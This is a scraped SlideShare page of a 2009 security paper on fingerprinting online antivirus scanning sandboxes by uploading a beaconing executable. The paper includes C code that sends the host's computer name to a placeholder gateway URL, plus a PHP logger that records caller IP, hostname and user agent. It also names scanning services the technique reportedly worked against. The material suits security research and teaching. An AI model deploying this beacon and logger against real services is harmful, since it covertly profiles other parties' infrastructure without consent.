SlideShare a Scribd company logo

Reverse Honey Traps - Beating Online Anti-virus Engine in its Own Game by Rohit Bansal

n|u - The Open Security Community
n|u - The Open Security Community

Web based online anti viruses are used heavily for scanning malware files and providing the resultant output. There are number of online service providers which perform inline scanning of uploaded malware executables by the normal user or the victims. This process is based on the hierarchical functions and different steps opted to analyze the viruses and other worm activities. The infections occur dynamically when the executable becomes active in the environment. Everything is automated in this process as servers residing at the backend scan the executable and sent the information to other third party servers for secondary analysis or updating their record directly. That’s how the normal functioning of free online malware scanner works.

Technology
1 of 8
Download to read offline
SCHAP SECURITY Reverse Honey Trap Striking Deep inside Online Web Antivirus Engines and Analyzers Security Researchers - Aditya K Sood (0kn0ck) / Rohit Bansal (RB 1337) 11/22/2009 SCHAP Security: http://www.schap.org Version (0.1)
Disclaimer There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages. No part of this publication may be reproduced, stored in a retrieval system or transmitted, in any form or by any means, photocopying, recording or otherwise, without prior written consent of SCHAP. While every precaution has been taken in the preparation of this publication, this publication and features described herein are subject to change without notice. 2|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
Overview Web based online anti viruses are used heavily for scanning malware files and providing the resultant output. There are number of online service providers which perform inline scanning of uploaded malware executables by the normal user or the victims. This process is based on the hierarchical functions and different steps opted to analyze the viruses and other worm activities. The infections occur dynamically when the executable becomes active in the environment. Everything is automated in this process as servers residing at the backend scan the executable and sent the information to other third party servers for secondary analysis or updating their record directly. That’s how the normal functioning of free online malware scanner works. The baseline revolves around the ingrained possibility to design a honey trap which can steal or extract the information from the online placed antivirus servers. This even includes the antivirus servers which are used for scanning purposes. There can be three cases: 1. Interface servers are termed as front end servers for uploading the executables. 2. Dynamic servers are termed as back end servers for direct scanning of the executable. 3. Third party servers which are used for scanning of an executable at other domains. The concept deals with designing a reverse honey trap through which information from anti virus scanning engines can be traced by uploading a packed executable. Once it is uploaded on the server it is unpacked and scanned in an inline manner to trace the objects residing in it. The infected traced object points to the attacker controlled domain and the code becomes inline thereby extracting critical information from antivirus servers. 3|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
Base Concept: Online antivirus engines are interoperable in nature. There are number of primary or secondary servers which are working collaboratively against a particular task. The only difference lies in their functionality. The base logic projects that viruses cannot hide within compressed modules because major anti-virus software support scanning inside the packed modules. This clearly indicates that every single object present inside the executable whether it is packed or not is definitely traced by the online antivirus engine. This process is termed as “Inline Scanning”. Our technique utilizes this efficient functionality of antivirus engines to steal information from the servers which are doing analysis and third party code scanning on the executable. Primarily executables are packed with some kind of object code which is linked to third party infected servers. Possible inclusion of third party code from the remote resource results in the infection of victim machine. This process is almost optimized for malware analysis as every scanned object is handled in a controlled environment. The databases are updated with analysis that are performed on the executables which are the source of infection or poses some kind of threat to the system. While scanning the inbuilt objects packed with the executable, all kinds of third party links are made active to analyze the behavior in a controlled environment. This process is carried out to scrutinize the resultant impact on the system thereby keeping an eye on the modules involved in it. Our research has shown the possibility of stealing antivirus server information with the same concept which enables us to gather sensitive information automatically. These servers can be secondary servers or virtual machines which are configured for scanning malwares and other heuristic based functionalities. It is possible to upload a custom designed executable that is packed with object code. If an executable is allowed to be scanned by the antivirus engine then it possible to steal the base information from the server without any difficulties. The scanned object which has a URL pointed to attacker controlled server executes the raw code present on the server in the context of the antivirus server which produces the trick. It is considered to be as one of the ingrained functionality of online antivirus scanner but it results in different output which is very critical for the running online antivirus server infrastructure. The code requires a PHP snippet and an executable which can perform the socket related operations. A very basic demo has been structure which can be tested. The sample executable code #include <windows.h> #include <wininet.h> #include <stdio.h> char szUrl[] = "http://www.server.com/gateway.php?"; // Can use your own custom server void StartBot() { char szBuffer[512],szCompname[128]; DWORD dwCount = 128; HINTERNET iHandle; GetComputerName(szCompname, &dwCount); /* sending some fake info to the logging site so it looks like a bot reporting in and downloading a file and so we get the computer name */ 4|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
_snprintf(szBuffer, sizeof(szBuffer) - 1,"%sbot=%s&uniquebotid=%d&botversion=11&get=install%d.exe", szUrl, szCompname,GetTickCount(),rand()%1000+100); iHandle = InternetOpen("Example Ser Ver 1.1", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, NULL); if(iHandle) { InternetOpenUrl(iHandle, szBuffer, NULL, 0, INTERNET_FLAG_RELOAD, 0); } InternetCloseHandle(iHandle); } int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrvInst,LPSTR lpCmdLine, int nvis) { srand(GetTickCount()); StartBot(); return 0; } The resultant output can be set as PHP code. For the above mentioned code and demo, the PHP code is structured as below: <?php /* It's just a concept of a AV/Sandbox Tracker Better use a database for storing the info rather than a text file */ date_default_timezone_set("America/New_York"); $h = fopen('antivirus.txt', 'a'); $a = $_GET['bot']; $b = getenv("REMOTE_ADDR"); $c = gethostbyaddr($b); $d = $_SERVER["HTTP_USER_AGENT"]; $e = date("d/m/Y H:i:s"); $data = " ------------------------------------------------------------n ttt$an ------------------------------------------------------------n Date: $e IP: $b HOST: $c USER-AGENT: $d ------------------------------------------------------------nn"; fwrite($h, $data); fclose($h); echo base64_encode("EXAMPLE_SER")."<br>^^^^err^^^^<br>file not found: ".$_GET['get']."<br>"; ?> The code presented above shows the functionality of this concept. 5|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
Work Flow Model: The work flow model is presented below. A snapshot of the information extracted based on the above mentioned attack. 6|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
This attack work successfully against: 1 NoVirusThanks – http://www.novirusthanks.org NoVirusThanks is another free online virus scan service that scans suspicious files for possible presence of virus, worms, Trojans and any other kind of malware using multiple Anti-Virus engines, consisting of 24 engines. 2. Virustotal – http://www.virustotal.com VirusTotal is free online virus scan service that analyzes suspicious files and facilitates the quick detection of viruses, worms, Trojans and all kinds of malware detected by antivirus engines consisting of a huge number of 37 engines! 3 Filter Bit – http://www.filterbit.com/index.cgi 7|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
Filterbit is a free online virus scan service where you can upload files for scanning, analysis and identification by multiple antivirus engines, consisting of 8 engines. References: [1] http://www.opsec.com/solutions/partners/downloads/Kaspersky_EngineTech_WP.pdf [2] http://hubpages.com/hub/Top-Free-Online-Virus-Scan [3] http://www.malwarehelp.org/online_anti_malware_scanners_single_file.html [4] http://www.securityfocus.com/infocus/1650 8|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines

Recommended

Humla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null SingaporeHumla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null Singapore
n|u - The Open Security Community
 
Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
n|u - The Open Security Community
 
Osint primer
Osint primerOsint primer
Osint primer
n|u - The Open Security Community
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
n|u - The Open Security Community
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
n|u - The Open Security Community
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
n|u - The Open Security Community
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
n|u - The Open Security Community
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
n|u - The Open Security Community
 

Recommended

Humla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null SingaporeHumla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null Singapore
n|u - The Open Security Community
 
Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
n|u - The Open Security Community
 
Osint primer
Osint primerOsint primer
Osint primer
n|u - The Open Security Community
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
n|u - The Open Security Community
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
n|u - The Open Security Community
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
n|u - The Open Security Community
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
n|u - The Open Security Community
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
n|u - The Open Security Community
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
n|u - The Open Security Community
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
n|u - The Open Security Community
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
n|u - The Open Security Community
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
n|u - The Open Security Community
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
n|u - The Open Security Community
 
Cloud security
Cloud security Cloud security
Cloud security
n|u - The Open Security Community
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
n|u - The Open Security Community
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
n|u - The Open Security Community
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
n|u - The Open Security Community
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
n|u - The Open Security Community
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
n|u - The Open Security Community
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
n|u - The Open Security Community
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
n|u - The Open Security Community
 
News bytes null 200314121904
News bytes null 200314121904News bytes null 200314121904
News bytes null 200314121904
n|u - The Open Security Community
 
XXE
XXEXXE
XXE
n|u - The Open Security Community
 
News Bytes
News BytesNews Bytes
News Bytes
n|u - The Open Security Community
 
Introduction to YARA rules
Introduction to YARA rulesIntroduction to YARA rules
Introduction to YARA rules
n|u - The Open Security Community
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
n|u - The Open Security Community
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
n|u - The Open Security Community
 
Social engineering
Social engineeringSocial engineering
Social engineering
n|u - The Open Security Community
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
 

More Related Content

More from n|u - The Open Security Community

More from n|u - The Open Security Community (20)

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 
News bytes null 200314121904
News bytes null 200314121904News bytes null 200314121904
News bytes null 200314121904
 
XXE
XXEXXE
XXE
 
News Bytes
News BytesNews Bytes
News Bytes
 
Introduction to YARA rules
Introduction to YARA rulesIntroduction to YARA rules
Introduction to YARA rules
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
 
Social engineering
Social engineeringSocial engineering
Social engineering
 

Recently uploaded

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 

Recently uploaded (20)

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 

Reverse Honey Traps - Beating Online Anti-virus Engine in its Own Game by Rohit Bansal

  • 1. SCHAP SECURITY Reverse Honey Trap Striking Deep inside Online Web Antivirus Engines and Analyzers Security Researchers - Aditya K Sood (0kn0ck) / Rohit Bansal (RB 1337) 11/22/2009 SCHAP Security: http://www.schap.org Version (0.1)
  • 2. Disclaimer There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages. No part of this publication may be reproduced, stored in a retrieval system or transmitted, in any form or by any means, photocopying, recording or otherwise, without prior written consent of SCHAP. While every precaution has been taken in the preparation of this publication, this publication and features described herein are subject to change without notice. 2|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
  • 3. Overview Web based online anti viruses are used heavily for scanning malware files and providing the resultant output. There are number of online service providers which perform inline scanning of uploaded malware executables by the normal user or the victims. This process is based on the hierarchical functions and different steps opted to analyze the viruses and other worm activities. The infections occur dynamically when the executable becomes active in the environment. Everything is automated in this process as servers residing at the backend scan the executable and sent the information to other third party servers for secondary analysis or updating their record directly. That’s how the normal functioning of free online malware scanner works. The baseline revolves around the ingrained possibility to design a honey trap which can steal or extract the information from the online placed antivirus servers. This even includes the antivirus servers which are used for scanning purposes. There can be three cases: 1. Interface servers are termed as front end servers for uploading the executables. 2. Dynamic servers are termed as back end servers for direct scanning of the executable. 3. Third party servers which are used for scanning of an executable at other domains. The concept deals with designing a reverse honey trap through which information from anti virus scanning engines can be traced by uploading a packed executable. Once it is uploaded on the server it is unpacked and scanned in an inline manner to trace the objects residing in it. The infected traced object points to the attacker controlled domain and the code becomes inline thereby extracting critical information from antivirus servers. 3|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
  • 4. Base Concept: Online antivirus engines are interoperable in nature. There are number of primary or secondary servers which are working collaboratively against a particular task. The only difference lies in their functionality. The base logic projects that viruses cannot hide within compressed modules because major anti-virus software support scanning inside the packed modules. This clearly indicates that every single object present inside the executable whether it is packed or not is definitely traced by the online antivirus engine. This process is termed as “Inline Scanning”. Our technique utilizes this efficient functionality of antivirus engines to steal information from the servers which are doing analysis and third party code scanning on the executable. Primarily executables are packed with some kind of object code which is linked to third party infected servers. Possible inclusion of third party code from the remote resource results in the infection of victim machine. This process is almost optimized for malware analysis as every scanned object is handled in a controlled environment. The databases are updated with analysis that are performed on the executables which are the source of infection or poses some kind of threat to the system. While scanning the inbuilt objects packed with the executable, all kinds of third party links are made active to analyze the behavior in a controlled environment. This process is carried out to scrutinize the resultant impact on the system thereby keeping an eye on the modules involved in it. Our research has shown the possibility of stealing antivirus server information with the same concept which enables us to gather sensitive information automatically. These servers can be secondary servers or virtual machines which are configured for scanning malwares and other heuristic based functionalities. It is possible to upload a custom designed executable that is packed with object code. If an executable is allowed to be scanned by the antivirus engine then it possible to steal the base information from the server without any difficulties. The scanned object which has a URL pointed to attacker controlled server executes the raw code present on the server in the context of the antivirus server which produces the trick. It is considered to be as one of the ingrained functionality of online antivirus scanner but it results in different output which is very critical for the running online antivirus server infrastructure. The code requires a PHP snippet and an executable which can perform the socket related operations. A very basic demo has been structure which can be tested. The sample executable code #include <windows.h> #include <wininet.h> #include <stdio.h> char szUrl[] = "http://www.server.com/gateway.php?"; // Can use your own custom server void StartBot() { char szBuffer[512],szCompname[128]; DWORD dwCount = 128; HINTERNET iHandle; GetComputerName(szCompname, &dwCount); /* sending some fake info to the logging site so it looks like a bot reporting in and downloading a file and so we get the computer name */ 4|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
  • 5. _snprintf(szBuffer, sizeof(szBuffer) - 1,"%sbot=%s&uniquebotid=%d&botversion=11&get=install%d.exe", szUrl, szCompname,GetTickCount(),rand()%1000+100); iHandle = InternetOpen("Example Ser Ver 1.1", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, NULL); if(iHandle) { InternetOpenUrl(iHandle, szBuffer, NULL, 0, INTERNET_FLAG_RELOAD, 0); } InternetCloseHandle(iHandle); } int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrvInst,LPSTR lpCmdLine, int nvis) { srand(GetTickCount()); StartBot(); return 0; } The resultant output can be set as PHP code. For the above mentioned code and demo, the PHP code is structured as below: <?php /* It's just a concept of a AV/Sandbox Tracker Better use a database for storing the info rather than a text file */ date_default_timezone_set("America/New_York"); $h = fopen('antivirus.txt', 'a'); $a = $_GET['bot']; $b = getenv("REMOTE_ADDR"); $c = gethostbyaddr($b); $d = $_SERVER["HTTP_USER_AGENT"]; $e = date("d/m/Y H:i:s"); $data = " ------------------------------------------------------------n ttt$an ------------------------------------------------------------n Date: $e IP: $b HOST: $c USER-AGENT: $d ------------------------------------------------------------nn"; fwrite($h, $data); fclose($h); echo base64_encode("EXAMPLE_SER")."<br>^^^^err^^^^<br>file not found: ".$_GET['get']."<br>"; ?> The code presented above shows the functionality of this concept. 5|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
  • 6. Work Flow Model: The work flow model is presented below. A snapshot of the information extracted based on the above mentioned attack. 6|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
  • 7. This attack work successfully against: 1 NoVirusThanks – http://www.novirusthanks.org NoVirusThanks is another free online virus scan service that scans suspicious files for possible presence of virus, worms, Trojans and any other kind of malware using multiple Anti-Virus engines, consisting of 24 engines. 2. Virustotal – http://www.virustotal.com VirusTotal is free online virus scan service that analyzes suspicious files and facilitates the quick detection of viruses, worms, Trojans and all kinds of malware detected by antivirus engines consisting of a huge number of 37 engines! 3 Filter Bit – http://www.filterbit.com/index.cgi 7|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines
  • 8. Filterbit is a free online virus scan service where you can upload files for scanning, analysis and identification by multiple antivirus engines, consisting of 8 engines. References: [1] http://www.opsec.com/solutions/partners/downloads/Kaspersky_EngineTech_WP.pdf [2] http://hubpages.com/hub/Top-Free-Online-Virus-Scan [3] http://www.malwarehelp.org/online_anti_malware_scanners_single_file.html [4] http://www.securityfocus.com/infocus/1650 8|Page Reverse Honey Trap – Striking Deep inside Online Antivirus Engines